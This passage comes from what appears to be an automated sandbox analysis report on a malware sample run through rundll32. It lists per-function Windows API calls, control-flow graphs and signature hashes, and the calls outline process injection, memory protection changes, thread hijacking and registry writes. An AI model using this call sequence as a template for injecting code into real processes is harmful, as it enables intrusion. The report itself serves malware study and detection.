                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0593C4A7
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0593C4C4
                              • memcpy.NTDLL(?,00000000,0000001C), ref: 0593C4D1
                              • NtClose.NTDLL(?), ref: 0593C4E3
                              • NtClose.NTDLL(?), ref: 0593C4ED
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 2575439697-0
                              • Opcode ID: 7b06e3c5ea36904f9ebbe6f4347cf8dea3985aeaf690cb25012541c74ea1f96f
                              • Instruction ID: bda6e819035c928e9ecfd7c57a9afd2c98c3460327b1ceda1d02df97687aab43
                              • Opcode Fuzzy Hash: 7b06e3c5ea36904f9ebbe6f4347cf8dea3985aeaf690cb25012541c74ea1f96f
                              • Instruction Fuzzy Hash: 312103B2A10218FBDB01AFA4CC4AAEEBFBDFF48750F114022F905F6111D7719A509BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph
                              (graph rendering omitted: function at 0x05946DE0, basic blocks 0x05946DE0-0x059470C0; the section-mapping calls it makes are listed under APIs below)
                              APIs
                              • memcpy.NTDLL(?,?,?,0593C71A,?,?,?,?,?,0593C71A,?,?,00000000), ref: 05946F59
                                • Part of subcall function 0593C4FB: GetModuleHandleA.KERNEL32(?,?,?,05947017,?,?,?,00000000), ref: 0593C539
                                • Part of subcall function 0593C4FB: memcpy.NTDLL(?,0595A30C,00000018,?,?,?), ref: 0593C5B5
                              • memcpy.NTDLL(?,?,00000018,0593C71A,?,?,?,?,?,0593C71A,?,?,00000000), ref: 05946FA7
                              • memcpy.NTDLL(?,0594DD8F,00000800,?,?,?,00000000), ref: 0594702A
                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 05947068
                              • NtClose.NTDLL(00000000,?,00000000), ref: 0594708F
                                • Part of subcall function 05948F62: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0593C71A,0593C71A,?,05946EFA,?,0593C71A,?,?,00000000), ref: 05948F87
                                • Part of subcall function 05948F62: GetProcAddress.KERNEL32(00000000,?), ref: 05948FA9
                                • Part of subcall function 05948F62: GetProcAddress.KERNEL32(00000000,?), ref: 05948FBF
                                • Part of subcall function 05948F62: GetProcAddress.KERNEL32(00000000,?), ref: 05948FD5
                                • Part of subcall function 05948F62: GetProcAddress.KERNEL32(00000000,?), ref: 05948FEB
                                • Part of subcall function 05948F62: GetProcAddress.KERNEL32(00000000,?), ref: 05949001
                                • Part of subcall function 0594BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0593717E,00000000,00000000,0593717E,?,00000002,00000000,?,0593C71A,00000000,0593717E,000000FF,?), ref: 0594BEAE
                                • Part of subcall function 05941CE4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,0593C71A,?,?,00000000), ref: 05941D58
                                • Part of subcall function 05941CE4: memcpy.NTDLL(?,?,?), ref: 05941DBF
                              • memset.NTDLL ref: 059470AA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                              • String ID:
                              • API String ID: 3674896251-0
                              • Opcode ID: 4d57ea997b8f353da5ee071459182ee9e7bb78285ec24822628e387e74d3f9ae
                              • Instruction ID: d0c0d220dd0360e1c380d55815de9a63bfb808552ae5cc9a2ce1211d03cac9b2
                              • Opcode Fuzzy Hash: 4d57ea997b8f353da5ee071459182ee9e7bb78285ec24822628e387e74d3f9ae
                              • Instruction Fuzzy Hash: 96A13AB1A0120AEFDF11DFA8C884EAEBBB9FF05304F104569E905A7251E731AE55CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph
                              (graph rendering omitted: function at 0x05942331, basic blocks 0x05942331-0x0594242A; calls the function at 0x05938FEC shown above)
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0594235C
                              • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05942369
                              • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 059423F5
                              • GetModuleHandleA.KERNEL32(00000000), ref: 05942400
                              • RtlImageNtHeader.NTDLL(00000000), ref: 05942409
                              • RtlExitUserThread.NTDLL(00000000), ref: 0594241E
                                • Part of subcall function 05940818: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05942397,?), ref: 05940820
                                • Part of subcall function 05940818: GetVersion.KERNEL32 ref: 0594082F
                                • Part of subcall function 05940818: GetCurrentProcessId.KERNEL32 ref: 0594084B
                                • Part of subcall function 05940818: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05940868
                                • Part of subcall function 0593C7B6: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0593C815
                                • Part of subcall function 0593A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05937D5E), ref: 0593A6BE
                                • Part of subcall function 0594212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0593111D,00000000), ref: 0594214D
                                • Part of subcall function 0594212C: GetProcAddress.KERNEL32(00000000,?), ref: 05942166
                                • Part of subcall function 0594212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0593111D,00000000), ref: 05942183
                                • Part of subcall function 0594212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0593111D,00000000), ref: 05942194
                                • Part of subcall function 0594212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0593111D,00000000), ref: 059421A7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                              • String ID:
                              • API String ID: 2581485877-0
                              • Opcode ID: 1d9f43e782bd6ca4e31c7dd25d8efa3ffa9ce42ad8480c92a24f9c0d94f3921c
                              • Instruction ID: a38f1b5f60004a829b62a1c8725d6fcdd296cbdc27b09dc5293b1394fafd089f
                              • Opcode Fuzzy Hash: 1d9f43e782bd6ca4e31c7dd25d8efa3ffa9ce42ad8480c92a24f9c0d94f3921c
                              • Instruction Fuzzy Hash: 6931BF75A04218AFCB22EF74DC89E6EBBB9FB84750F514124F506EB201DB349D44CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 05937167
                                • Part of subcall function 0594BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0593717E,00000000,00000000,0593717E,?,00000002,00000000,?,0593C71A,00000000,0593717E,000000FF,?), ref: 0594BEAE
                              • memset.NTDLL ref: 0593718B
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID: @
                              • API String ID: 2533685722-2766056989
                              • Opcode ID: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                              • Instruction ID: 0278438e25e6bd50676a342f579078be5bf545b6205fd8b7a215b271876c0160
                              • Opcode Fuzzy Hash: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                              • Instruction Fuzzy Hash: 17210BB6D00209AFDB11DFE9C8859EFFBB9EB48354F104529E616F3250D730AA448FA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetProcAddress.KERNEL32(?,00000318), ref: 059461D3
                              • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 059461EF
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                                • Part of subcall function 0594A806: GetProcAddress.KERNEL32(?,00000000), ref: 0594A82F
                                • Part of subcall function 0594A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05946230,00000000,00000000,00000028,00000100), ref: 0594A851
                              • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05946359
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                              • String ID:
                              • API String ID: 3547194813-0
                              • Opcode ID: 8314240149ef92f7bfda9d52b2870ed91625cc1adf32feda639cf46b65e09979
                              • Instruction ID: a3ad1f7168788b4cb8be5dcf906e31ed84d3f27e93aab28a6cab39205c704d41
                              • Opcode Fuzzy Hash: 8314240149ef92f7bfda9d52b2870ed91625cc1adf32feda639cf46b65e09979
                              • Instruction Fuzzy Hash: 1D613CB1A0424AABDF15CFA4C880FAEBBB9FF49704F004129E905A7241DB74ED54CFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 05940796
                              • GetProcAddress.KERNEL32(?), ref: 059407BE
                              • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 059407DC
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressInformationProcProcess64QueryWow64memset
                              • String ID:
                              • API String ID: 2968673968-0
                              • Opcode ID: 2a59c68cc86499d990932f64b3271bd4a68865403b6e09539dec893519d54206
                              • Instruction ID: d02d24b81ae0f73c7bdc3da41bd385ea29e5e11b77b63e83a8ddca4abf5d9c37
                              • Opcode Fuzzy Hash: 2a59c68cc86499d990932f64b3271bd4a68865403b6e09539dec893519d54206
                              • Instruction Fuzzy Hash: 0811A331A14219AFDB00CB94DD09F99BBA9EB44700F054024F904EF280DB70ED15CFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(0594EB0F,00000000,00000000,0594EB0F,00003000,00000040), ref: 05947981
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 05947988
                              • SetLastError.KERNEL32(00000000), ref: 0594798F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$AllocateLastMemoryStatusVirtual
                              • String ID:
                              • API String ID: 722216270-0
                              • Opcode ID: 11ec697bb79ad78ee33b3ef726373f58959ae9771401fa99f086c55fa062bc8b
                              • Instruction ID: 0dc46071d8a9baf0698afe7eb45bd09ed1736c32757ee067bd3bf843c733b413
                              • Opcode Fuzzy Hash: 11ec697bb79ad78ee33b3ef726373f58959ae9771401fa99f086c55fa062bc8b
                              • Instruction Fuzzy Hash: 49F0FEB1525309FBEB05CBD5D90AFAEBBBCEB44359F104048F605A6180EBB4EB14DB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0594907F,?,00000004,00000000,00000004,?), ref: 05945330
                              • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0594533F
                              • SetLastError.KERNEL32(00000000,?,0594907F,?,00000004,00000000,00000004,?,?,?,?,0593C691,?,00000000,CCCCFEEB,?), ref: 05945346
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$LastMemoryStatusVirtualWrite
                              • String ID:
                              • API String ID: 1089604434-0
                              • Opcode ID: 8fc1e9888bb24bbb2692614e4ee0187ca92cc6e5e2593486a63bcdfbdf32b4d2
                              • Instruction ID: c0085c9ef5ddd18687ebb700848a057afd123dbd2dc26c531dea05a2998a8eeb
                              • Opcode Fuzzy Hash: 8fc1e9888bb24bbb2692614e4ee0187ca92cc6e5e2593486a63bcdfbdf32b4d2
                              • Instruction Fuzzy Hash: 99E01A3220821AEBCF015EE8AC05D9EBF69FB08740B014010FE01D2121DB71DC31EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetProcAddress.KERNEL32(?,00000000), ref: 0594A82F
                              • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05946230,00000000,00000000,00000028,00000100), ref: 0594A851
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressMemory64ProcReadVirtualWow64
                              • String ID:
                              • API String ID: 752694512-0
                              • Opcode ID: 22592f7e6e02f85d8f3162eedbd9b7859fc0cb39f97674eccea76fabfd6a50ad
                              • Instruction ID: a121661c2711d153d56be57180a00a04c5b596c9712ee8d43155c7492a5b7123
                              • Opcode Fuzzy Hash: 22592f7e6e02f85d8f3162eedbd9b7859fc0cb39f97674eccea76fabfd6a50ad
                              • Instruction Fuzzy Hash: 24F0F476614209BFCB128F99DD45C9AFFBAFB88711B544219F905C3220EA71E962DB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,0593717E,00000000,00000000,0593717E,?,00000002,00000000,?,0593C71A,00000000,0593717E,000000FF,?), ref: 0594BEAE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction ID: 8f8c68f813a4492b5ab536cba04fc10cc550a462c6979a9a29f40ef9362b7378
                              • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction Fuzzy Hash: 52F012B690420CFFDB119FA5CC85CDFBBBDEB44244B008C29F642D1050D231DE189B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0595A400), ref: 059374C5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 1bb03a8f941c7251900cdeb89a2179caec6b3f7e63bfc0c8851ee4c3c5a8f2bb
                              • Instruction ID: 81618d2cc4bcf5430c363bbb44cad5bb343c04311991058148554b47a9ef4654
                              • Opcode Fuzzy Hash: 1bb03a8f941c7251900cdeb89a2179caec6b3f7e63bfc0c8851ee4c3c5a8f2bb
                              • Instruction Fuzzy Hash: E2F09A71704114DB8B20CB99D88AEABBFAAFB053907004510E901DB220E220FA01CBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 100 59334ff-5933510 101 5933512-593351e call 5931268 call 594e869 100->101 102 5933564-593356f 100->102 116 5933524-5933531 SleepEx 101->116 104 5933571 call 5939e82 102->104 105 5933576-5933588 call 5942650 102->105 104->105 111 593358a-5933597 ReleaseMutex CloseHandle 105->111 112 5933599-59335a0 105->112 111->112 114 59335a2-59335af ResetEvent CloseHandle 112->114 115 59335b1-59335be SleepEx 112->115 114->115 115->115 117 59335c0 115->117 116->116 118 5933533-593353a 116->118 119 59335c5-59335d2 SleepEx 117->119 120 5933550-5933562 RtlDeleteCriticalSection * 2 118->120 121 593353c-5933542 118->121 122 59335d4-59335d9 119->122 123 59335db-59335e2 119->123 120->102 121->120 124 5933544-593354b call 594e803 121->124 122->119 122->123 125 59335f3-59335fa 123->125 126 59335e4-59335ed HeapFree 123->126 124->120 128 5933602-5933608 125->128 129 59335fc-59335fd call 59483fa 125->129 126->125 130 593360a-5933611 128->130 131 5933619-5933620 128->131 129->128 130->131 133 5933613-5933615 130->133 134 5933622-5933623 RtlRemoveVectoredExceptionHandler 131->134 135 5933629-593362f 131->135 133->131 134->135 136 5933631 call 5939131 135->136 137 5933636 135->137 136->137 139 593363b-5933648 SleepEx 137->139 140 5933651-593365a 139->140 141 593364a-593364f 139->141 142 5933672-5933682 LocalFree 140->142 143 593365c-5933661 140->143 141->139 141->140 143->142 144 5933663 143->144 145 5933666-5933670 FindCloseChangeNotification 144->145 145->142 145->145
                              APIs
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0594E846), ref: 05933528
                              • RtlDeleteCriticalSection.NTDLL(0595A3E0), ref: 0593355B
                              • RtlDeleteCriticalSection.NTDLL(0595A400), ref: 05933562
                              • ReleaseMutex.KERNEL32(0000059C,00000000,?,?,?,0594E846), ref: 0593358B
                              • CloseHandle.KERNEL32(?,?,0594E846), ref: 05933597
                              • ResetEvent.KERNEL32(00000000,00000000,?,?,?,0594E846), ref: 059335A3
                              • CloseHandle.KERNEL32(?,?,0594E846), ref: 059335AF
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0594E846), ref: 059335B5
                              • SleepEx.KERNEL32(00000064,00000001,?,?,0594E846), ref: 059335C9
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0594E846), ref: 059335ED
                              • RtlRemoveVectoredExceptionHandler.NTDLL(057505B8), ref: 05933623
                              • SleepEx.KERNEL32(00000064,00000001,?,?,0594E846), ref: 0593363F
                              • FindCloseChangeNotification.KERNEL32(05F3F2C0,?,?,0594E846), ref: 05933668
                              • LocalFree.KERNEL32(?,?,0594E846), ref: 05933678
                                • Part of subcall function 05931268: GetVersion.KERNEL32(?,?,76CDF720,?,05933517,00000000,?,?,?,0594E846), ref: 0593128C
                                • Part of subcall function 05931268: GetModuleHandleA.KERNEL32(?,05F397B5,?,76CDF720,?,05933517,00000000,?,?,?,0594E846), ref: 059312A9
                                • Part of subcall function 05931268: GetProcAddress.KERNEL32(00000000), ref: 059312B0
                                • Part of subcall function 0594E869: RtlEnterCriticalSection.NTDLL(0595A400), ref: 0594E873
                                • Part of subcall function 0594E869: RtlLeaveCriticalSection.NTDLL(0595A400), ref: 0594E8AF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSectionSleep$CloseHandle$DeleteFree$AddressChangeEnterEventExceptionFindHandlerHeapLeaveLocalModuleMutexNotificationProcReleaseRemoveResetVectoredVersion
                              • String ID:
                              • API String ID: 1047430009-0
                              • Opcode ID: 32ec932a09ecee9399ed671b3a4602e63cebb80911b945e6a979044ae9440597
                              • Instruction ID: 79dc709662cbbd1c72967e3830b89eabd17185059ff7a2cf1a99dac99fb0fdef
                              • Opcode Fuzzy Hash: 32ec932a09ecee9399ed671b3a4602e63cebb80911b945e6a979044ae9440597
                              • Instruction Fuzzy Hash: F9417F31768301DFDB20AF75EA8BA19BFADBB40756B810525F606D7250DF70E860CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 146 5931a0a-5931a2b call 5953d64 149 5931a31-5931a32 146->149 150 5931b0d 146->150 151 5931a34-5931a37 149->151 152 5931a98-5931a9f 149->152 153 5931b13-5931b22 VirtualProtect 150->153 156 5931b64-5931b70 call 5953d9f 151->156 157 5931a3d 151->157 154 5931aa1-5931aa8 152->154 155 5931ae0-5931af5 VirtualProtect 152->155 158 5931b24-5931b3a VirtualProtect 153->158 159 5931b3f-5931b45 GetLastError 153->159 154->155 161 5931aaa-5931ab6 154->161 155->153 163 5931af7-5931b0b 155->163 160 5931a43-5931a4a 157->160 158->160 159->156 164 5931a8c-5931a93 160->164 165 5931a4c-5931a50 160->165 161->153 166 5931ab8-5931ac5 VirtualProtect 161->166 168 5931adc-5931ade VirtualProtect 163->168 164->156 165->164 169 5931a52-5931a6e lstrlen VirtualProtect 165->169 166->153 170 5931ac7-5931adb 166->170 168->153 169->164 171 5931a70-5931a8a lstrcpy VirtualProtect 169->171 170->168 171->164
                              APIs
                              • lstrlen.KERNEL32(?,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977,0594893A,?,?), ref: 05931A58
                              • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931A6A
                              • lstrcpy.KERNEL32(00000000,?), ref: 05931A79
                              • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931A8A
                              • VirtualProtect.KERNEL32(00000001,00000005,00000040,-0000001C,05956040,00000018,059334DB,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000), ref: 05931AC1
                              • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931ADC
                              • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,05956040,00000018,059334DB,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000), ref: 05931AF1
                              • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,05956040,00000018,059334DB,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000), ref: 05931B1E
                              • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931B38
                              • GetLastError.KERNEL32(?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977,0594893A,?,?), ref: 05931B3F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                              • String ID:
                              • API String ID: 3676034644-0
                              • Opcode ID: d8ad3afa492640a5c86ed6626e4e4190fb05609bfca9ecbc2e1902fe7f7a6467
                              • Instruction ID: d476eef4a62e817fae2a2bca368420b485589fa90087f23da232f36def987b4a
                              • Opcode Fuzzy Hash: d8ad3afa492640a5c86ed6626e4e4190fb05609bfca9ecbc2e1902fe7f7a6467
                              • Instruction Fuzzy Hash: E6416C71A04709DFDB20CFA0CC46EABBBB9FB48310F018519E656A65A0E734E815DF20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 172 593c5c4-593c609 memset call 594212c 175 593c6f5-593c6fc 172->175 176 593c60f 172->176 177 593c702-593c705 call 594ed07 175->177 178 593c616-593c61e 175->178 176->178 184 593c70a 177->184 180 593c620-593c637 call 5946de0 178->180 181 593c63d-593c64f 178->181 180->181 190 593c73c-593c740 180->190 182 593c651-593c658 call 59314c6 181->182 183 593c65b-593c672 call 5945220 181->183 182->183 195 593c734 GetLastError 183->195 196 593c678-593c67c 183->196 189 593c73a 184->189 189->190 193 593c742 190->193 194 593c74b-593c751 190->194 193->194 195->189 197 593c682-593c693 call 5949048 196->197 198 593c72d-593c732 196->198 197->195 201 593c699 197->201 198->190 202 593c69e-593c6ba WaitForSingleObject 201->202 204 593c6bf-593c6e2 SuspendThread call 59336bb 202->204 205 593c6bc-593c6be 202->205 208 593c6e4-593c6e7 204->208 209 593c6e9-593c6ec 204->209 205->204 208->202 208->209 210 593c6ee-593c6f3 209->210 211 593c70c-593c71a call 5946de0 209->211 212 593c71c-593c72b call 5949048 210->212 211->212 212->190
                              APIs
                              • memset.NTDLL ref: 0593C5E7
                                • Part of subcall function 0594212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0593111D,00000000), ref: 0594214D
                                • Part of subcall function 0594212C: GetProcAddress.KERNEL32(00000000,?), ref: 05942166
                                • Part of subcall function 0594212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0593111D,00000000), ref: 05942183
                                • Part of subcall function 0594212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0593111D,00000000), ref: 05942194
                                • Part of subcall function 0594212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0593111D,00000000), ref: 059421A7
                              • ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 0593C6A1
                              • WaitForSingleObject.KERNEL32(00000064), ref: 0593C6AF
                              • SuspendThread.KERNEL32(00000004), ref: 0593C6C2
                                • Part of subcall function 05946DE0: memset.NTDLL ref: 059470AA
                              • ResumeThread.KERNEL32(00000004), ref: 0593C745
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                              • String ID: v
                              • API String ID: 2397206891-1801730948
                              • Opcode ID: d9cb9b035ac894da3f3906efb30511c05224f7de7eb3174149dca1206eb5cad1
                              • Instruction ID: ccaa2ec74f244840912bee9b025fa8cbb5d609aacd843e4b97eb5e5fc552989f
                              • Opcode Fuzzy Hash: d9cb9b035ac894da3f3906efb30511c05224f7de7eb3174149dca1206eb5cad1
                              • Instruction Fuzzy Hash: 10417A71A00609EFDB21AFA4CD8AEAE7FAAFF44354F144465F906A6110DB30DE51CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 217 5943959-5943991 call 594bad1 220 59439f5-5943a0a WaitForSingleObject 217->220 221 5943993 217->221 223 5943af4-5943b2d RtlExitUserThread 220->223 224 5943a10-5943a1e 220->224 222 5943996-59439ab call 594a651 221->222 240 59439dc-59439f3 call 594e803 222->240 241 59439ad-59439c4 222->241 228 5943b40-5943b67 CreateProcessA 223->228 229 5943b2f-5943b3b 223->229 225 5943a24-5943a45 RegOpenKeyA 224->225 226 5943ab0-5943ac3 call 5943829 224->226 230 5943a47-5943a69 RegSetValueExA RegCloseKey 225->230 231 5943a6f-5943a72 225->231 226->223 248 5943ac5-5943ad4 WaitForSingleObject 226->248 232 5943b74-5943b76 228->232 233 5943b69-5943b6f call 5945d7a 228->233 229->228 245 5943b3d 229->245 230->231 237 5943a74-5943a77 231->237 238 5943a79-5943aad call 594e778 231->238 242 5943b7e-5943b8c 232->242 243 5943b78-5943b79 call 594e803 232->243 233->232 237->226 237->238 238->226 240->220 240->222 241->240 254 59439c6-59439d7 call 593f39b 241->254 243->242 245->228 248->223 252 5943ad6-5943af1 call 594d30a 248->252 252->223 254->240
                              APIs
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0594BB1D
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0594BB29
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BB71
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BB8C
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BBC4
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?), ref: 0594BBCC
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BBEF
